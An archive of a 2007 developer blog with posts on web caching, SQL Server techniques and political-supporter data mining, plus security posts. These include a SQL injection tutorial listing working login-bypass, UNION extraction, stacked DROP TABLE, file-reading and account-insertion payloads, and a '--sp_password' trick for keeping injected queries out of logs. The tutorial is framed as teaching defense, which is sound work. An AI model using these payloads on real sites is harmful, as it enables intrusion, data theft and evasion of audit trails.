Monday, December 17, 2007

Make your website faster in 5 minutes

The "speed" or "performance" of your website is only based on one thing: how long it takes from when your user clicks until the data gets from your servers to the eyeballs of your user. Some companies can spend hundreds of hours and millions of dollars tuning queries, to shave off 20% of a 5ms query, but at the end of the day all that matters is your application's response time as perceived by the end user.

For most websites I'd say 2% of the time is spent in the database, 20% in the app code, 10-20% in transfer or latency, while the rest is spent or wasted on the front end. If I were going to spend the least amount of time/money for the biggest performance gain, I would focus on the front end of the application. Specifically, on how the browser requests, caches and renders data.

Your end user shouldn't have to wait around for stuff he doesn't need. There's no point in hitting the webserver again and again requesting the same exact media files (css/javascript/images). These don't change, so it's a waste of processing power and bandwidth to serve them repeatedly. To prevent this, you have to tell the user's browser that its local cache shouldn't expire instantly. Set far-future Expires headers on your static content and you won't have to serve it again and again. Doing this is trivial in either Apache or IIS

ExpiresActive On
ExpiresDefault "access plus 1 month"
This is what I have set on my static content server. If you're using the same webserver to serve up dynamic content, you probably want to specify Expires headers by type instead
ExpiresByType image/gif A2592000
ExpiresByType image/png A2592000
ExpiresByType image/jpg A2592000
ExpiresByType image/jpeg A2592000
ExpiresByType application/x-javascript A2592000
ExpiresByType text/css A2592000
You might have just reduced your bandwidth and response time by 20%. Additionally, read up on ETags and why they should be configured correctly. Probably just do this
FileETag none
Obviously, you want to send as little data as possible out of your webserver. Reducing file sizes and using common css/js files are pretty obvious performance techniques. What you might also want to do is compress text files as they are sent from your webserver; modern browsers can decode gzipped data at the small expense of processing power. To enable Apache to send gzipped content, use mod_deflate
AddOutputFilterByType DEFLATE text/html text/plain text/xml text/css application/x-javascript
In my experience this seems to reduce the size of html/js/css files by 60% or more. Obviously this will reduce the transfer time of your content.

Finally, understand how browsers render web pages. Any time JavaScript is run, the browser will block page rendering. This is because JavaScript is able to write out data to the page. If you load all your JavaScript in the <head>, your page won't start rendering on the client until it has all been transferred and loaded in the browser. Additionally you probably want to load all of your CSS as soon as possible; that way you can start fetching required images as soon as possible if needed. A good rule of thumb:

Put your CSS at the top of the page
Put your JavaScript at the bottom of the page


On a side note, Django rocks and mootools rocks

Tuesday, November 06, 2007

The Fine Art of Software Estimation

Overheard at Social Sample:

"by the way 25-30 hours really means 60 hours"

"I'm just taking all estimates and doubling them now...even if people have already doubled them, i'm doing it again; blanket policy"
Maybe we need some Evidence Based Estimation

Friday, November 02, 2007

Metallica Fans Don't Support Hillary Clinton

What happens when you take a giant database full of social data and do some light data-mining and statistics: lots of random facts! (arguably worthless or priceless depending on what you use them for).

I am spending my Friday at Social Sample analyzing social data from supporters of 2008 presidential candidates; data found on online social networks. After coming up with some basic demographics, I searched the user base for music interests with high correlations relative to the normal population, using an algorithm similar to the one that powers Social Suggester. I found that the artists / bands with the highest correlation to Hillary Clinton supporters were:

"MADONNA"
"TORI AMOS"
"FIONA APPLE"
"BJORK"
"PRINCE"
"DEPECHE MODE"
"GWEN STEFANI"
"PORTISHEAD"
"THE SMITHS"
"ELTON JOHN"
"NO DOUBT"
"KELLY CLARKSON"
"MILES DAVIS"
"THE CURE"
"JUSTIN TIMBERLAKE"
Hmm Interesting. Now what happens if you change the Social Suggester ranking algorithm to find the bands/artists with the lowest correlation between these two data sets?

"ATREYU"
"THE USED"
"MUDVAYNE"
"SLIPKNOT"
"TAKING BACK SUNDAY"
"BREAKING BENJAMIN"
"YELLOWCARD"
"DISTURBED"
"HINDER"
"BLINK 182"
"PANTERA"
"50 CENT"
"STAIND"
"METALLICA"
"SYSTEM OF A DOWN"

Also interesting. These correlations weren't extremely high, but Hillary Clinton supporters that use online social networks were 4x less likely to be a fan of 50 Cent, and 5x less likely to be a fan of Breaking Benjamin. I'm not going to make any assumptions about what kind of people support Hillary Clinton; all we can say is that there is a high correlation between the types of people who enjoy the first set of artists/bands, and a low correlation with the second. If anyone reads this, please feel free to share any insight, and let me know if there are any other subcultures you'd like to see info on. I'll leave you with some random data about Hillary Clinton supporters (these are not facts [read: please don't sue me], just the data that our engine spat out based on analysis of the target group). Enjoy.

Interesting differences (all compared to the normal population, sample size =10.5 Million, all statistically significant)

Supporters were no more likely to be Female
Supporters were 10.9x more likely to be gay
Supporters were 1.25x more likely to be married
Supporters were 1.25x more likely to be a parent
Supporters were 1.50x more likely to be in grad school

Supporters were 2.01x more likely to be Agnostic
Supporters were 1.9x more likely to be Jewish
Supporters were 2.50x less likely to be Muslim
Supporters were 1.12x less likely to be Catholic

The same proportion of supporters Smoke cigarettes, but they are 1.1x less likely to drink alcohol


Find other high correlations at Social Suggester, or contact me for something specific. evan at socialsample . com

Wednesday, October 03, 2007

A cool way to alias columns

A cool way to alias columns, dunno how useful this is, but kinda cool


SELECT t.alpha, t.beta, t.gamma
FROM (SELECT 11, 22, 33) AS t(alpha, beta, gamma)

Monday, September 24, 2007

SQL Server Log Bypass

SQL Server (in)conveniently doesn't log queries which have sp_password in them (so the passwords don't show up in the logs).

This means that someone trying to break into your database using SQL injection can tack on "--sp_password" to the end of all their queries to avoid leaving a trail in the DB logs.

Of course, all the requests will still be stored in the web server log... unless you use POST instead of GET.
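
For illustration, an injected batch using the trick might end up looking something like this (the users table and its columns here are hypothetical, just to show the marker appended at the end):

SELECT * FROM products WHERE id = 1; SELECT name, password FROM users --sp_password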

Sunday, September 23, 2007

Why you should use stored procedures. aka How to do SQL Injection.

Use stored procedures. Don't let people choose the queries that are being run on your database or you might open yourself up to a lot of harm. Any novice database user can turn your simple web app into an unrestricted interface to your database and/or server. Below are some common examples showing how hackers exploit your code to damage your database or access restricted data

1. Commenting out code / Login Bypass
A typical line of code that checks authentication based on a user name and password

SELECT * FROM members WHERE username = '$username' AND password = '$password'
What gets run on your database here if someone enters in their username as " admin'-- " with no password?

SELECT * FROM members WHERE username = 'admin'--' AND password = ''


Unless you're escaping string terminators (single quotes here), the user was just able to bypass authentication as an arbitrary user.
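
The standard fix is to stop concatenating user input into the statement at all. Here's a minimal sketch using a parameterized stored procedure; the members table matches the example above, but the procedure name is mine:

CREATE PROCEDURE dbo.CheckLogin
@username NVARCHAR(50),
@password NVARCHAR(50)
AS
BEGIN
-- the values arrive as typed parameters, so a stray quote in @username
-- is just data and can't terminate the string or comment out the password check
SELECT * FROM members
WHERE username = @username
AND password = @password;
END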


2. Stacked Queries
Depending on the database driver and the database being used, multiple SQL queries can be run in the same batch. This allows hackers to stack arbitrary SQL onto the end of a normal query
SELECT * FROM products WHERE id = $id
This code might grab the product id out of the query string and then run the query above. But if the hacker changes the query string and forces in a non-integer value such as "10; DROP TABLE products", what actually runs is:

SELECT * FROM products WHERE id = 10;
DROP TABLE products;

Probably not what you want your view product page to do.

3. UNION Injections: Forcing data out of the database

Imagine a page like this

http://somesite.com/viewproducts?productype=1

which grabs the names of products of a certain type from the database by executing this code and SQL

SELECT productname FROM products WHERE type = $productypeid

for each productName in productNameResult
echo productName + "<br>"


Normally this pseudocode would output all the product names. However if the hacker changes the query string around they can turn your view products page into an easy interface to the data. Imagine the hacker massaged the querystring a tiny bit and changed the producttypeid parameter to be "1 and 1=0 union select username + '-' + password as productname from users_tbl " This would yield the following SQL
SELECT productname FROM products WHERE type = 1 and 1=0 union select username + '-' + password as productname from users_tbl

the end result is a dump of all the usernames / passwords on your view products page

username1-password1
username2-password2
username3-password3

4. Avoiding Anti-SQL Injection

You might think that an easy fix to this would be to just check for single quotes and escape them. However there are a bunch of ways to enter strings without quotes. For example in MySQL this will dump out the file C:\boot.ini

SELECT LOAD_FILE(0x633A5C626F6F742E696E69)

Hackers will commonly concatenate strings together using database functions

SELECT CHAR(75)+CHAR(76)+CHAR(77)
5. Bypassing Logins and Authentication
Unfortunately most amateur sites will break or bypass authentication if you try some of these usernames:
  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--
  • Or to logon as a diff user:
    • ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
More advanced sites might try MD5 password hash checks; these can be bypassed as well

Username : admin
Password : 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

6. Leveraging Error Messages
In SQL Server a hacker can use the Having clause to figure out what columns are being selected in the query they are trying to hack by entering the following fields in order.
  • ' HAVING 1=1 --
  • ' GROUP BY table.columnfromerror1 HAVING 1=1 --
  • ' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
  • ' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 -- and so on
  • If you are not getting any more errors, you're done.
If the hacker is trying to do UNION SQL injection knowing the number of columns will help them greatly; they can use the order by clause to do this:
  • ORDER BY 1--
  • ORDER BY 2--
  • ORDER BY N-- so on
  • Keep going until you get an error. The error means you've found the number of selected columns.

7. Figuring out Column Types
If a hacker is trying to do UNION injection they'll have to know what types each of the columns are. Since datatype errors appear before union target errors, the hacker can easily figure this out by using aggregate or convert functions.

'union select sum(columntofind) from users--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.
11223344) UNION SELECT 1,'2',3,NULL WHERE 1=2 --
Error! - Third column is not an integer.
...Microsoft OLE DB Provider for SQL Server error '80040e07'
Explicit conversion from data type int to image is not allowed.
8. Inserting Arbitrary Data
A hacker can use SQL injection to create an account in your app
; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*

9. Figuring out database type

@@version is a hacker's friend (at least in MySQL and SQL Server)
INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)
10. Bulk Inserts to pull data off the server

Insert a file's contents into a table. If you don't know the internal path of the web application, you can read the IIS metabase file (IIS 6 only, %systemroot%\system32\inetsrv\MetaBase.xml) and then search it to identify the application path.

    1. Create table foo( line varchar(8000) )
    2. bulk insert foo from 'c:\inetpub\wwwroot\login.asp'
    3. Drop temp table, and repeat for another file.
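
Roughly, the injected batch might look like this; the path comes from the example above, and how the attacker reads the rows back out (e.g. a UNION against foo) is left as an exercise:

CREATE TABLE foo (line VARCHAR(8000));
BULK INSERT foo FROM 'c:\inetpub\wwwroot\login.asp';
-- ...read the file contents back, e.g. ' UNION SELECT line FROM foo --
DROP TABLE foo;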

Friday, July 27, 2007

Persistent Logging through Aborted Transactions

Sometimes you want to log that a transaction failed when the transaction is aborted. This can be a problem when the logging is part of the rolled-back transaction.


CREATE TABLE TranLogging (id int)
CREATE TABLE Test (id int)
CREATE TABLE #Test (id int)
DECLARE @TranLogging table (id int)

BEGIN TRAN
INSERT INTO @TranLogging VALUES(1)
INSERT INTO Test VALUES(1)
INSERT INTO #Test VALUES(1)
ROLLBACK TRAN

SELECT '@TranLogging',COUNT(*) FROM @TranLogging
SELECT ' test',COUNT(*) FROM Test
SELECT '#test',COUNT(*) FROM #Test

insert into TranLogging
select * from @TranLogging

select * from TranLogging

DROP TABLE Test,#Test,TranLogging


You'll notice that the row inserted into the table variable was maintained after the rollback. You can use this behavior after a rolled-back transaction to copy failures/abortions into a more persistent logging table.

Thursday, July 12, 2007

Capital IQ Screening Team mentioned on TheStreet.com

As you probably know, I work for Capital IQ on the Screening & Analytics Team, and I'm always interested to see how clients use the tools I help develop. Today we were mentioned on TheStreet.com as a tool used by one of their writers; although we do have the majority of Wall Street as clients, it's always cool to see a mention in the media.

These Gene-Drug Stocks Are Getting Hot

Thursday, July 05, 2007

Calculating Medians in TSQL using 2005 Window Functions

Calculating medians is a common operation in many applications, and it can be expensive when done inefficiently.

The hard part about medians is that you need to take the middle value for an odd number of elements and the 2 middle values for an even number of elements.

The cool thing here is that when you number these two sequences sorted in opposite directions, the absolute difference between the two row numbers is smaller than or equal to 1 only for the elements that are required for the median calculation.

In this case you're using 'memberid' (or some other unique value) as the tiebreaker to guarantee determinism of the row number calculations. This is required for using this trick to figure out the median.

Once you grab only the values you need for the median calculation you can isolate them by grouping them by groupid and calculate the average for each group.

WITH RN AS
(
SELECT groupid, val,
ROW_NUMBER() OVER(PARTITION BY groupid ORDER BY val, memberid) AS rna,
ROW_NUMBER() OVER(PARTITION BY groupid ORDER BY val DESC, memberid DESC) AS rnd
FROM dbo.Groups
)

SELECT groupid, AVG(1.*val) AS median
FROM RN
WHERE ABS(rna - rnd) <= 1
GROUP BY groupid;



Here's the temp table I made to test this out

USE tempdb;
GO

IF OBJECT_ID('dbo.Groups') IS NOT NULL
DROP TABLE dbo.Groups;
GO

CREATE TABLE dbo.Groups
(
groupid VARCHAR(10) NOT NULL,
memberid INT NOT NULL,
string VARCHAR(10) NOT NULL,
val INT NOT NULL,
PRIMARY KEY (groupid, memberid)

);

INSERT INTO dbo.Groups(groupid, memberid, string, val)
VALUES('a', 3, 'stra1', 6);

INSERT INTO dbo.Groups(groupid, memberid, string, val)
VALUES('a', 9, 'stra2', 7);

INSERT INTO dbo.Groups(groupid, memberid, string, val)
VALUES('b', 2, 'strb1', 3);

INSERT INTO dbo.Groups(groupid, memberid, string, val)
VALUES('b', 4, 'strb2', 7);

INSERT INTO dbo.Groups(groupid, memberid, string, val)
VALUES('b', 5, 'strb3', 3);

INSERT INTO dbo.Groups(groupid, memberid, string, val)
VALUES('b', 9, 'strb4', 11);

INSERT INTO dbo.Groups(groupid, memberid, string, val)
VALUES('c', 3, 'strc1', 8);

INSERT INTO dbo.Groups(groupid, memberid, string, val)
VALUES('c', 7, 'strc2', 10);

INSERT INTO dbo.Groups(groupid, memberid, string, val)
VALUES('c', 9, 'strc3', 12);
GO

Thursday, June 07, 2007

SQL Server 2008

On Monday at TechEd they announced the official name of the next version of SQL Server - Microsoft SQL Server 2008 and released the first public CTP (Community Technology Preview) of it for people to start playing with and evaluating.

Thursday, May 31, 2007

Generating a Numbers table

A numbers table can be really useful for lots of reasons, but I'm not going to go over that here; I'm just going to document my journey trying to create one.

Unfortunately, I'm a .NET programmer so I normally think of a procedural way to do things first. When I wanted to create a numbers table I started off with a looping solution. It's not pretty, but it works, and you only have to run it once so who cares:

SET NOCOUNT ON
BEGIN TRAN
DECLARE @LoopCounter INT
SET @LoopCounter = 1
WHILE @LoopCounter <= 10000
BEGIN
INSERT numbers_tbl
VALUES(@LoopCounter)
SET @LoopCounter = @LoopCounter + 1
END

COMMIT WORK
GO


This took 29 seconds on our development DB server. Not bad for a one-time cost, but there must be a different way, so I tried a recursive query that used a table expression. This looked like a pretty sweet query

DECLARE @n AS BIGINT;
SET @n = 1000000;

WITH Nums AS
(
SELECT 1 AS n
UNION ALL
SELECT n + 1
FROM Nums
WHERE n < @n

)
INSERT INTO numbers_tbl
SELECT n
FROM Nums OPTION(MAXRECURSION 0);
GO

>Table 'numbers_tbl'. Scan count 0, logical reads 1009505
>Table 'Worktable'. Scan count 2, logical reads 6000001


Turned out this took 45 seconds; it ended up being a bit slower than my procedural version. This approach is kinda lame anyway. Really, all we need to do is generate the first 1000 rows and then cross join them with themselves to generate the million rows required. These rows won't have the right numbers per se, but we can use the ROW_NUMBER function to give each row a number, yielding us a numbers table from 1 to a million.

DECLARE
@n AS BIGINT;
SET @n = 1000000;
WITH
Base AS
(
SELECT 1 AS n
UNION ALL
SELECT n + 1 FROM Base WHERE n < 1000

),
Expand AS
(
SELECT 1 AS c
FROM Base AS B1, Base AS B2

),
Nums AS
(
SELECT ROW_NUMBER() OVER(ORDER BY c) AS n
FROM Expand

)
INSERT INTO numbers_tbl
SELECT n FROM Nums
WHERE n <= @n
OPTION(MAXRECURSION 0);


Ah, success: this took 18 seconds, with 9K reads as opposed to 7M. I'm guessing that as the number of entries in the numbers table goes up, this query will scale much better.

This is good, but it's not perfect. (Not perfect enough for Voodoo-Itzik-black-sql-magic arts practitioners.) The problem with the previous solution is that we're still stuck doing recursive selects for the first 1000 rows. Why start off with the square root? Why not add an additional cross join, allowing us to start off at sqrt(sqrt(@n))? In fact, let's just start off with 2, and we'll continue to cross join these together (increasing by an exponential factor of 2 on each join). With 5 joins we can generate 4.2B rows, and we use the minimal number of initial selects.

In this case, we start with a CTE that has only 2 rows and square the row count with each following CTE by cross-joining two instances of the previous CTE. This results in 2^(2^N) rows; we can use the same row number trick to generate the actual numbers to insert into our table.

DECLARE @n AS BIGINT;
SET @n = 1000000;
WITH
L0 AS(SELECT 1 AS c UNION ALL SELECT 1),
L1 AS(SELECT 1 AS c FROM L0 AS A, L0 AS B),
L2 AS(SELECT 1 AS c FROM L1 AS A, L1 AS B),
L3 AS(SELECT 1 AS c FROM L2 AS A, L2 AS B),
L4 AS(SELECT 1 AS c FROM L3 AS A, L3 AS B),
L5 AS(SELECT 1 AS c FROM L4 AS A, L4 AS B),
Nums AS(SELECT ROW_NUMBER() OVER(ORDER BY c) AS n FROM L5)

INSERT INTO numbers_tbl
SELECT n FROM Nums
WHERE n <= @n;
GO



This query ran in only 2 seconds. If you want more than 4B rows you can add an additional level (L6) for 2^64 rows. Chances are no machine can even store that much, so I've left off L6.

Now you can have the largest numbers table at your company.

Thursday, May 24, 2007

When to not not use Cursors Part 2

If you're a new-hire or intern of ours at Capital IQ, stop reading, never use cursors. Ever.

Well, my last attempt to prove that cursors can sometimes be useful was derailed by my co-worker Mike Forman.

This time I have a better (read: valid) example.

I have the following table (the script to create it is at the end of this post), which shows a bunch of employees at an unnamed company and the number of bugs they've fixed each day. For each of these employees I want to determine the running total of bugs fixed, each day. I can use the results of this query to create a pretty graph of bugs fixed over time per developer.


Now, using a cursor-based solution we scan each piece of data once, which guarantees O(n) performance, meaning that as the number of entries in our table increases we can still create the desired results in time proportional to the number of rows. A set-based solution suffers from O(n^2) performance (assuming there is no index on empid, BugsFixed). Even if there were an index, a scan would result in (developers * (days + days^2)/2) rows scanned...which basically simplifies to O(n^2).

Now, since cursors involve some overhead, the cursor solution will lose to the set-based solution for a small number of items; however, due to the performance limitations described above, the cursor solution is the only scalable choice for this problem.

Now watch Mike beat this using the OVER Clause.....
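
(For the record, the window-function version would look roughly like the sketch below. SQL Server 2005's OVER clause doesn't support running-total frames, so this assumes a version that does, SQL Server 2012 or later; on 2005 Mike will need another trick.)

SELECT empid, workDay, bugsFixed,
SUM(bugsFixed) OVER(PARTITION BY empid ORDER BY workDay ROWS UNBOUNDED PRECEDING) AS runbugsFixed
FROM tempdb.dbo.BugCounts
ORDER BY empid, workDay;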


Code to Create this table:

--CREATE TABLE
IF OBJECT_ID('tempdb.dbo.BugCounts') IS NOT NULL
DROP TABLE tempdb.dbo.BugCounts;
GO

CREATE TABLE tempdb.dbo.BugCounts
(
empid INT NOT NULL,
workDay smalldatetime NOT NULL,
bugsFixed INT NOT NULL,

PRIMARY KEY(empid, workDay)
);

--POPULATE TABLE create 10K data points
DECLARE
@newn AS INT, @newempid AS INT,
@newworkDay As INT, @newbugsFixed As INT

DECLARE C CURSOR FAST_FORWARD FOR
SELECT top 10000 n
FROM numbers_tbl
OPEN C
FETCH NEXT FROM C INTO @newn;
WHILE @@fetch_status = 0
BEGIN
INSERT
INTO tempdb.dbo.BugCounts
VALUES (@newn%25, dateadd(day, rand()*-300, GetDAte()), CAST(RAND()*100 AS INTEGER))
FETCH NEXT FROM C INTO @newn;
END
CLOSE
C;
DEALLOCATE C;



Cursor Solution:

DECLARE
@Result
TABLE
(empid INT, workDay SMALLDATETIME, bugsFixed INT, runbugsFixed INT);

DECLARE
@empid AS INT,@prvempid AS INT, @workDay SMALLDATETIME,
@bugsFixed AS INT, @runbugsFixed AS INT;


DECLARE C CURSOR FAST_FORWARD FOR
SELECT empid, workDay, bugsFixed
FROM tempdb.dbo.BugCounts
ORDER BY empid, workDay;

OPEN C

FETCH NEXT FROM C INTO @empid, @workDay, @bugsFixed;
SELECT @prvempid = @empid, @runbugsFixed = 0;

WHILE @@fetch_status = 0
BEGIN
IF
@empid <> @prvempid
SELECT @prvempid = @empid, @runbugsFixed = 0;

SET @runbugsFixed = @runbugsFixed + @bugsFixed;

INSERT INTO @Result
VALUES(@empid, @workDay, @bugsFixed, @runbugsFixed);

FETCH NEXT FROM C
INTO @empid, @workDay, @bugsFixed;
END

CLOSE
C;
DEALLOCATE C;
select *
from @result
order by empid, workday;

Improving SQL Server Performance

True or False? SQL Server produces execution plans that minimize overall resource use to improve system wide performance.

False. SQL Server minimizes the time it takes to return results to the client; if multiple CPUs are available it will run parts of the query in parallel even though a single-CPU plan would minimize overall resource use.

When dealing with database performance problems, many database professionals will look at a variety of metrics: queue sizes, cache hit ratios, etc. However, when users hit your database, the only important metric is how long it takes for the database system to return results. System performance metrics are a lot different from the user's perceived performance, and at the end of the day only the latter matters.

The engine optimizes execution plans with this goal in mind; Solid Quality Learning's query tuning methodology revolves around the same concept. Taking a top-down approach allows you to spend your time fixing the worst bottlenecks.

Methodology:

  1. Analyze waits at the instance level
  2. Correlate waits with queues
  3. Determine a course of action
  4. Drill down to the database/file level
  5. Drill down to the process level
  6. Tune indexes and queries

So go: SELECT * FROM sys.dm_os_wait_stats
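
Or, to make step 1 a bit more digestible, sort the waits by total wait time; a quick sketch (filtering out zero-wait types is my own addition):

SELECT wait_type, wait_time_ms, signal_wait_time_ms, waiting_tasks_count
FROM sys.dm_os_wait_stats
WHERE wait_time_ms > 0
ORDER BY wait_time_ms DESC;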




More true/false cause I was bored:

Queries that never change, run against data in tables that never change, always produce the same result. False. Not all queries have a distinct/unique correct logical result; SQL Server execution plans may change based on external factors, and as the plan changes, operations may be reordered.

WHERE clauses are always evaluated after the join clauses. False. WHERE clauses are only logically evaluated after the joins; the query optimizer may adjust the physical evaluation of the query by filtering before the joins for increased efficiency.

Monday, May 21, 2007

When to not not use Cursors

Cursors are usually bad to use; almost always there is a more efficient way to solve your problem using a set based solution. However there are some cases when cursors allow you to create a solution that is exponentially easier to implement than a set based solution. In general you should only resort to using cursors when a difficult set based solution becomes trivial when solved using cursors.

A classic example: you have 5 classrooms of various sizes and 3 classes of various sizes, and you want to assign a classroom to each class using the minimum space required.


We'll simplify this problem and leave dates and times out of this issue :). Now, this problem is very difficult to solve using a set-based solution (it is possible, google Itzik). However, it is pretty trivial to solve using a cursor-based solution; pseudocode below

  1. Declare 2 cursors: one over the list of classrooms (let's call it RoomsCursor) sorted by increasing capacity (number of seats), and another over the list of classes (ClassesCursor) sorted by increasing number of students.
  2. Now fetch the first (smallest, since you sorted ascending) class from ClassesCursor.
  3. While the fetch returned a class that needs a classroom:
    1. Fetch the smallest unused classroom from RoomsCursor. If there is no available room, or the room is too small, continue and fetch the next smallest. Repeat fetching new rooms until you find a room that fits or you run out of rooms.
    2. If you didn't run out of rooms (the last fetch yielded a room with at least as many seats as the current class has students), schedule the class.
    3. Else, you ran out of rooms!
    4. Fetch another class.
  4. Return the scheduled events.
In this case we are scanning both the classrooms and the classes in order. We never back up either cursor. We schedule classes by matching classes to classrooms until we either run out of classes to find classrooms for or we run out of rooms to accommodate classes. The only time there is an error is when no solution exists.

This solution runs in O(N) time since we are simply stepping through the cursors; in the worst case we look at each class and each classroom once.

This will set up the problem:

USE tempdb;
GO
IF OBJECT_ID('dbo.Classes') IS NOT NULL
DROP TABLE dbo.Classes;
GO
IF OBJECT_ID('dbo.Classrooms') IS NOT NULL
DROP TABLE dbo.Classrooms;
GO

CREATE TABLE dbo.Classrooms
(
classroomid VARCHAR(10) NOT NULL PRIMARY KEY,
classSize INT NOT NULL
);

INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('C001', 2000);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('B101', 1500);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('B102', 100);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('R103', 40);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('R104', 40);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('B201', 1000);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('R202', 100);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('R203', 50);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('B301', 600);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('R302', 55);
INSERT INTO dbo.Classrooms(classroomid, classSize) VALUES('R303', 55);

CREATE TABLE dbo.Classes
(
classid INT NOT NULL PRIMARY KEY,
eventdesc VARCHAR(25) NOT NULL,
attendees INT NOT NULL
);

INSERT INTO dbo.Classes(classid, eventdesc, attendees)
VALUES(1, 'Mikes Adv T-SQL Seminar', 193);
INSERT INTO dbo.Classes(classid, eventdesc, attendees)
VALUES(2, 'CIQ .NET Pages', 51);
INSERT INTO dbo.Classes(classid, eventdesc, attendees)
VALUES(3, 'How to Break the DB', 232);
INSERT INTO dbo.Classes(classid, eventdesc, attendees)
VALUES(4, 'XAML ROCKS', 89);
INSERT INTO dbo.Classes(classid, eventdesc, attendees)
VALUES(5, 'CIQ Security Issues', 897);
INSERT INTO dbo.Classes(classid, eventdesc, attendees)
VALUES(6, 'Data Modeling 101', 46);
GO

CREATE INDEX idx_att_eid_edesc
ON dbo.Classes(attendees, classid, eventdesc);
CREATE INDEX idx_classSize_rid
ON dbo.Classrooms(classSize, classroomid);
GO
Cursor Solution:

DECLARE
@classroomid AS VARCHAR(10), @classSize AS INT,
@classid AS INT, @attendees AS INT;

DECLARE @Result TABLE(classroomid VARCHAR(10), classid INT);

DECLARE CClassrooms CURSOR FAST_FORWARD FOR
SELECT classroomid, classSize FROM dbo.Classrooms
ORDER BY classSize, classroomid;
DECLARE CClasses CURSOR FAST_FORWARD FOR
SELECT classid, attendees FROM dbo.Classes
ORDER BY attendees, classid;

OPEN CClassrooms;
OPEN CClasses;

FETCH NEXT FROM CClasses INTO @classid, @attendees;
WHILE @@FETCH_STATUS = 0
BEGIN
FETCH NEXT FROM CClassrooms INTO @classroomid, @classSize;

WHILE @@FETCH_STATUS = 0 AND @classSize < @attendees
FETCH NEXT FROM CClassrooms INTO @classroomid, @classSize;

IF @@FETCH_STATUS = 0
INSERT INTO @Result(classroomid, classid) VALUES(@classroomid, @classid);
ELSE
BEGIN
RAISERROR('Not enough Classrooms for Classes.', 16, 1);
BREAK;
END

FETCH NEXT FROM CClasses INTO @classid, @attendees;
END

CLOSE CClassrooms;
CLOSE CClasses;

DEALLOCATE CClassrooms;
DEALLOCATE CClasses;

SELECT classroomid, classid FROM @Result;
GO

Thursday, May 10, 2007

What I Learned at Devscovery

  • We love XAML
  • We love LINQ
  • ASP.NET AJAX is sooo 2 weeks ago
  • If you aren't using Silverlight, you're not cutting edge
  • Jeffrey Richter knows more than you do about programming
  • If your website/presentation/resume doesn't have graphics with reflections, then it's not cool
  • Every thing/technology should be asynchronous
  • Jeff Prosise loves Microsoft technology more than you do
  • People named Jeff are smart
  • WCF makes me fall asleep...or I passed out from XML spec overload
  • Read Ingo Rammer's blog: http://blogs.thinktecture.com/
  • Make a macro for !do
  • OutOfMemory exceptions occur when we can't allocate space in the large object heap
  • !dumpheap is the most important command, except if you forget -stat you might have just given yourself a 10m coffee break
  • !dumpheap -min 1mb...figure out why we get OutOfMemory
  • Memory resurrection is a 'dark corner' of the garbage collector...aka necromancy
  • The garbage collector is magical
  • No one knows what an async pinned handle is
  • !traverseheap dumps to XML - read it in with CLR Profiler
  • 'Don't try to outthink Microsoft'
  • Study the Rotor code
  • Never call GC.Collect()...it is self tuning
  • Finalization is evil, unless you want performance consultants at your office
  • There are a ton of unannounced features in Orcas
  • Buy .NET Memory Profiler

Wednesday, May 09, 2007

Tips to Prevent SQL Injection

The following are examples of steps you can take to ensure some level of protection from SQL injection; however, any situation where you are generating dynamic SQL will leave you vulnerable to clever hackers.

In order to reduce the surface area for attack, do not enable functionality that isn't required, such as the SQL Server Agent service or xp_cmdshell (which allows arbitrary commands to be run on the server).
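
On SQL Server 2005, for example, you can make sure xp_cmdshell stays off through sp_configure; a quick sketch:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;  -- off by default in 2005; this keeps it that way
RECONFIGURE;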

Always provide minimal permissions to the executing user in order to limit their options and reduce your exposure. In SQL Server 2005, you can impersonate users, so the new credentials will even apply to code invoked dynamically at the server. This feature opens up a whole new set of security concerns. Dynamic SQL can now run under impersonated user credentials and not even require direct permissions from the user executing the stored procedure.

Inspect user input thoroughly and use stored procedures. If special characters are allowed, use pattern matching to check whether SQL injection constructs (such as single quotes, two dashes, sp_, xp_, UNION, etc.) exist in the input.

Always limit the lengths of inputs when possible. This will help reduce the hacker's ability to damage your system; email address fields shouldn't be thousands of characters long.

Use stored procedures! Stored procedures encapsulate user input to the database, type checking the input as well as letting you grant only the permissions needed.

In general, dynamic SQL is always dangerous since the user's input can end up being executed. If possible it's always safer to use static code, as long as attention is paid to security issues. There are several tricks you can use to avoid dynamic SQL, such as using functions to parse input and invoke static code. Using static code will also give you a performance edge, since ad hoc dynamic SQL tends to generate a new execution plan for each distinct input.

If you ever need to expect quotes in your input (such as text inputs for a blog or something), a safe way to prevent SQL injection is to simply replace CHAR(39) with CHAR(39)+CHAR(39); this will make it impossible for the hacker to escape the string. Using dynamic SQL can be very powerful, but misuse and/or abuse can cause inefficient code that may open your database to attacks.
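
As a sketch, the quote-doubling trick looks like this when building a dynamic statement (the blog_comments table is made up for the example):

DECLARE @comment NVARCHAR(1000), @sql NVARCHAR(2000);
SET @comment = N'it''s a test';  -- pretend this came from the user
-- double any single quotes so the value can't terminate the string literal
SET @comment = REPLACE(@comment, CHAR(39), CHAR(39) + CHAR(39));
SET @sql = N'INSERT INTO blog_comments(body) VALUES(''' + @comment + N''')';
EXEC sp_executesql @sql;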

Tuesday, May 08, 2007

Correctly Setting Up tempdb

